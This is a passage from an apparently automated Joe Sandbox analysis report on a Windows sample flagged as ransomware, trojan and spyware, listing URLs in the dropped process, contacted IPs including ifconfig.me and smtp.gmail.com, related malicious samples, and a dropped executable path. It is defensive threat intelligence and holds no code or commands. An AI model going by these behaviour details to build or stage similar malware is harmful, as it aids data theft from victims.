                                      http://www.jiyu-kobo.co.jp/rtrsystems.exe, 00000007.00000003.418015504.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417372932.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418453499.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417090439.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417881177.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417024752.0000000006EE6000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418702778.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417681977.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418628253.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418299099.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.carterandcone.comn-usystems.exe, 00000007.00000003.415116859.0000000006EF5000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.415369282.0000000006EF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://www.fontbureau.com/designers/?systems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.founder.com.cn/cn/bThesystems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.jiyu-kobo.co.jp/jp/Esystems.exe, 00000007.00000003.418453499.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418702778.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418628253.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418299099.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://www.fontbureau.com/designers?systems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.fontbureau.com/designersYsystems.exe, 00000007.00000002.824503837.0000000006EC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.tiro.comsystems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.founder.com.cn/cn;systems.exe, 00000007.00000003.413957196.0000000006EF4000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.414026080.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.413874101.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.414103181.0000000006EF2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.goodfont.co.krsystems.exe, 00000007.00000003.412459929.0000000006EEA000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.carterandcone.comsystems.exe, 00000007.00000003.415258973.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.415116859.0000000006EF5000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.415023457.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.415470289.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.414826258.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.414750139.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.415369282.0000000006EF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.jiyu-kobo.co.jp/jp/9systems.exe, 00000007.00000003.418015504.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418453499.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418702778.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418628253.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418299099.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.typography.netDsystems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://schemas.mDDexplorer.exe, 0000001E.00000002.818546416.000000000459F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.galapagosdesign.com/staff/dennis.htmsystems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://fontfabrik.comsystems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.carterandcone.comDsystems.exe, 00000007.00000003.415369282.0000000006EF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.typography.netsystems.exe, 00000007.00000003.409168651.0000000006EDE000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.comcomsystems.exe, 00000007.00000003.427416963.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427208138.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427591126.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425945988.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425627065.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427767848.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427950469.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.428133404.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.426560527.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.426303683.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427007078.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425778256.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.426081001.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.426676887.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425479830.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.426446779.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://schemas.mZexplorer.exe, 00000020.00000002.815012293.00000000057C0000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: safe
                                            		unknown
                                            http://www.founder.com.cn/cnn-usystems.exe, 00000007.00000003.413417698.0000000006EDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fontbureau.comrsivsystems.exe, 00000007.00000003.421480167.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                            • URL Reputation: safe
                                            		unknown
                                            http://www.fonts.comsystems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.sandoll.co.krsystems.exe, 00000007.00000003.412459929.0000000006EEA000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.sakkal.comsystems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.typography.net(systems.exe, 00000007.00000003.409436719.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.409043945.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.409317684.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.409168651.0000000006EDE000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		low
                                              http://www.fontbureau.comdusystems.exe, 00000007.00000003.427416963.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427208138.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427591126.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427767848.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427950469.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.428133404.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.426560527.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427007078.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.426676887.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                              • Avira URL Cloud: safe
                                              		unknown
                                              http://www.apache.org/licenses/LICENSE-2.0systems.exe, 00000007.00000002.824888453.00000000080D2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.fontbureau.comsystems.exe, 00000007.00000003.451835767.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427416963.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424015179.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.428310301.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427208138.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.442388907.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427591126.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425945988.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.451120837.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.442278325.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.450386784.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.451358905.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.425627065.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427767848.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427950469.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.441736083.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.428133404.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.442020963.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.452320757.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.424654751.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.451607757.0000000006EDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.fontbureau.comFsystems.exe, 00000007.00000003.427416963.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.428310301.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427208138.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.442388907.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427591126.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.442278325.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.428881889.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.428711021.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427767848.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427950469.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.441736083.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.428133404.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.442020963.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.429083181.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.428551965.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.426560527.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.427007078.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.441472380.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.426676887.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.429229307.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.carterandcone.comTCsystems.exe, 00000007.00000003.415258973.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.414826258.0000000006EDE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.carterandcone.comTexsystems.exe, 00000007.00000003.415369282.0000000006EF5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.founder.com.cn/cn/g2systems.exe, 00000007.00000003.412552746.0000000006EDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.fontbureau.comdasystems.exe, 00000007.00000003.422815987.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.422967285.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.423126605.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.423319847.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.423679779.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.423852630.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.422681830.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.423496830.0000000006EE7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://en.wikipediasystems.exe, 00000007.00000003.451835767.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.451120837.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.450386784.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.451358905.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.824520229.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.452320757.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.451607757.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.449653969.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.449871222.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.450875400.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.450170584.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.450609069.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.452067543.0000000006EDF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://pki.goog/gsr1/gsr1.crt02systems.exe, 00000007.00000003.457942102.000000000616B000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.823724817.0000000006131000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457885749.000000000619C000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457992607.0000000006162000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457810585.0000000006150000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457702110.0000000006182000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457437090.0000000006192000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457247412.0000000006152000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457825204.0000000006154000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.458043801.0000000006141000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457573921.000000000616E000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000002.823863544.000000000619F000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.457645276.0000000006193000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.sandoll.co.krussystems.exe, 00000007.00000003.412326974.0000000006EDE000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.412552746.0000000006EDF000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.412459929.0000000006EEA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.jiyu-kobo.co.jp/jp/systems.exe, 00000007.00000003.418015504.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417372932.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418453499.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417090439.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417881177.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417024752.0000000006EE6000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418702778.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.417681977.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418628253.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.418299099.0000000006EE7000.00000004.00000800.00020000.00000000.sdmp, systems.exe, 00000007.00000003.416787050.0000000006EE6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://www.fontbureau.com/designersicosystems.exe, 00000007.00000002.824503837.0000000006EC0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    108.177.127.109
                                                    		unknownUnited States
                                                    		15169GOOGLEUSfalse
                                                    34.117.59.81
                                                    		ifconfig.meUnited States
                                                    		139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                    108.177.127.108
                                                    		smtp.gmail.comUnited States
                                                    		15169GOOGLEUSfalse

                                                    Private

                                                    IP
                                                    192.168.2.1

                                                    General Information

                                                    Joe Sandbox Version:34.0.0 Boulder Opal
                                                    Analysis ID:565576
                                                    Start date:03.02.2022
                                                    Start time:08:57:42
                                                    Joe Sandbox Product:CloudBasic
                                                    Overall analysis duration:0h 14m 17s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Sample file name:2cB42TzofC (renamed file extension from none to exe)
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                    Number of analysed new started processes analysed:43
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • HDC enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Detection:MAL
                                                    Classification:mal66.rans.troj.spyw.evad.winEXE@46/4@26/4
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HDC Information:
                                                    • Successful, ratio: 26.9% (good quality ratio 25.5%)
                                                    • Quality average: 78.4%
                                                    • Quality standard deviation: 28.3%
                                                    HCA Information:
                                                    • Successful, ratio: 99%
                                                    • Number of executed functions: 137
                                                    • Number of non-executed functions: 85
                                                    Cookbook Comments:
                                                    • Adjust boot time
                                                    • Enable AMSI
                                                    • Override analysis time to 240s for rundll32

                                                    Errors

                                                    • Sigma runtime error: Invalid condition: ( false && false || false Rule: Logon Scripts (UserInitMprLogonScript)

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, rundll32.exe, BackgroundTransferHost.exe, WMIADAP.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                    • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                    • VT rate limit hit for: 2cB42TzofC.exe

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    08:58:55API Interceptor285x Sleep call for process: systems.exe modified
                                                    08:59:06API Interceptor5x Sleep call for process: explorer.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    34.117.59.81GUxrs12a5c.exeGet hashmaliciousBrowse
                                                    • ifconfig.me/ip
                                                    QsVcXHKf6h.apkGet hashmaliciousBrowse
                                                    • ipinfo.io/json
                                                    QsVcXHKf6h.apkGet hashmaliciousBrowse
                                                    • ipinfo.io/json
                                                    6mcCKhxziZ.exeGet hashmaliciousBrowse
                                                    • ifconfig.me/ip
                                                    zHIeitCle2.exeGet hashmaliciousBrowse
                                                    • ifconfig.me/ip
                                                    VeHC0dKQWq.exeGet hashmaliciousBrowse
                                                    • ifconfig.me/ip
                                                    kXTrDKY4WA.exeGet hashmaliciousBrowse
                                                    • ifconfig.me/ip
                                                    gzonpuWTjw.exeGet hashmaliciousBrowse
                                                    • ipinfo.io/json
                                                    Qyv3Iv0iuqZmMdbtNMUdMdsZlwNGTLQSn5nxUWI.dllGet hashmaliciousBrowse
                                                    • myexternalip.com/raw
                                                    293QdZJ0Ea.msiGet hashmaliciousBrowse
                                                    • myexternalip.com/raw
                                                    h88PHxIXDh.exeGet hashmaliciousBrowse
                                                    • ipinfo.io/102.129.143.64
                                                    1AAe67iZRW.exeGet hashmaliciousBrowse
                                                    • ipinfo.io/102.129.143.64
                                                    6V72tfyDB4.exeGet hashmaliciousBrowse
                                                    • ipinfo.io/country
                                                    ertpl_4.0.apkGet hashmaliciousBrowse
                                                    • ipinfo.io/json
                                                    9ou6FfkRzQ.exeGet hashmaliciousBrowse
                                                    • ipinfo.io/102.129.143.96
                                                    Chrome servies.exeGet hashmaliciousBrowse
                                                    • ipinfo.io/102.129.143.96
                                                    cf16e91a8611d4dfbba4af8164ab661d612e21a4403a6.exeGet hashmaliciousBrowse
                                                    • ipinfo.io/country
                                                    ReadLineS0SAT.exeGet hashmaliciousBrowse
                                                    • ipinfo.io/102.129.143.40
                                                    test.exeGet hashmaliciousBrowse
                                                    • ipinfo.io/102.129.143.40
                                                    workfromhomepolicy.exeGet hashmaliciousBrowse
                                                    • ifconfig.me/ip

                                                    Domains

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    ifconfig.meibEVRlfsUA.exeGet hashmaliciousBrowse
                                                    • 34.117.59.81
                                                    GUxrs12a5c.exeGet hashmaliciousBrowse
                                                    • 34.117.59.81
                                                    6mcCKhxziZ.exeGet hashmaliciousBrowse
                                                    • 34.117.59.81
                                                    zHIeitCle2.exeGet hashmaliciousBrowse
                                                    • 34.117.59.81
                                                    VeHC0dKQWq.exeGet hashmaliciousBrowse
                                                    • 34.117.59.81
                                                    kXTrDKY4WA.exeGet hashmaliciousBrowse
                                                    • 34.117.59.81
                                                    workfromhomepolicy.exeGet hashmaliciousBrowse
                                                    • 34.117.59.81
                                                    UUXQwuYmWt.exeGet hashmaliciousBrowse
                                                    • 34.117.59.81
                                                    sb6NYrKwey.exeGet hashmaliciousBrowse
                                                    • 34.117.59.81
                                                    tmp.exeGet hashmaliciousBrowse
                                                    • 34.117.59.81
                                                    AveryNuker.exeGet hashmaliciousBrowse
                                                    • 34.117.59.81
                                                    seraph.exeGet hashmaliciousBrowse
                                                    • 34.117.59.81
                                                    DsGo26G94d.exeGet hashmaliciousBrowse
                                                    • 34.117.59.81
                                                    p5.exeGet hashmaliciousBrowse
                                                    • 34.117.59.81
                                                    kEtjx4XwPd.exeGet hashmaliciousBrowse
                                                    • 34.117.59.81
                                                    TIJYYlYJpv.exeGet hashmaliciousBrowse
                                                    • 34.117.59.81
                                                    ONIu4vsKdI.exeGet hashmaliciousBrowse
                                                    • 34.117.59.81
                                                    a8nAtkkusE.exeGet hashmaliciousBrowse
                                                    • 34.117.59.81
                                                    b4NByUUZ52.exeGet hashmaliciousBrowse
                                                    • 34.117.59.81
                                                    cAkprChGtW.exeGet hashmaliciousBrowse
                                                    • 34.117.59.81

                                                    ASNs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    GOOGLE-AS-APGoogleAsiaPacificPteLtdSG9BlIQXiJZW.exeGet hashmaliciousBrowse
                                                    • 34.118.37.165
                                                    HxKdekkY8e.exeGet hashmaliciousBrowse
                                                    • 34.118.37.165
                                                    ibEVRlfsUA.exeGet hashmaliciousBrowse
                                                    • 34.117.59.81
                                                    UmUq2meIt9.exeGet hashmaliciousBrowse
                                                    • 34.118.37.165
                                                    DHL Delivery Documents PDF.exeGet hashmaliciousBrowse
                                                    • 34.117.168.233
                                                    eeb0c6a760a7c9d17c02dbacf4f4715917caf3d111209.exeGet hashmaliciousBrowse
                                                    • 34.117.59.81
                                                    GUxrs12a5c.exeGet hashmaliciousBrowse
                                                    • 34.117.59.81
                                                    krosJKUAuV.exeGet hashmaliciousBrowse
                                                    • 34.117.59.81
                                                    STATEMENT[2022.02.01_14-19].xllGet hashmaliciousBrowse
                                                    • 34.117.59.81
                                                    vgbaeFkpZj.exeGet hashmaliciousBrowse
                                                    • 34.118.37.165
                                                    u1e8zH0EYU.exeGet hashmaliciousBrowse
                                                    • 34.118.37.165
                                                    u4bPc0etOZ.exeGet hashmaliciousBrowse
                                                    • 34.118.37.165
                                                    FR38mbFhFm.exeGet hashmaliciousBrowse
                                                    • 34.118.37.165
                                                    L4ncd3hASg.exeGet hashmaliciousBrowse
                                                    • 34.118.37.165
                                                    ZTdJwwdc1E.exeGet hashmaliciousBrowse
                                                    • 34.118.37.165
                                                    document-22665.csvGet hashmaliciousBrowse
                                                    • 34.117.59.81
                                                    hDqKiRqXAN.exeGet hashmaliciousBrowse
                                                    • 34.118.37.165
                                                    FmdzDCanl4.exeGet hashmaliciousBrowse
                                                    • 34.118.37.165
                                                    JoQnFSprJS.exeGet hashmaliciousBrowse
                                                    • 34.118.37.165
                                                    momucxST7e.exeGet hashmaliciousBrowse
                                                    • 34.118.37.165

                                                    JA3 Fingerprints

                                                    No context

                                                    Dropped Files

                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                    C:\Users\Public\Downloads\systems.exeGUxrs12a5c.exeGet hashmaliciousBrowse

                                                      Created / dropped Files

                                                      C:\Users\Public\Downloads\systems.exe

                                                      Download File
                                                      Process:C:\Users\user\Desktop\2cB42TzofC.exe
                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
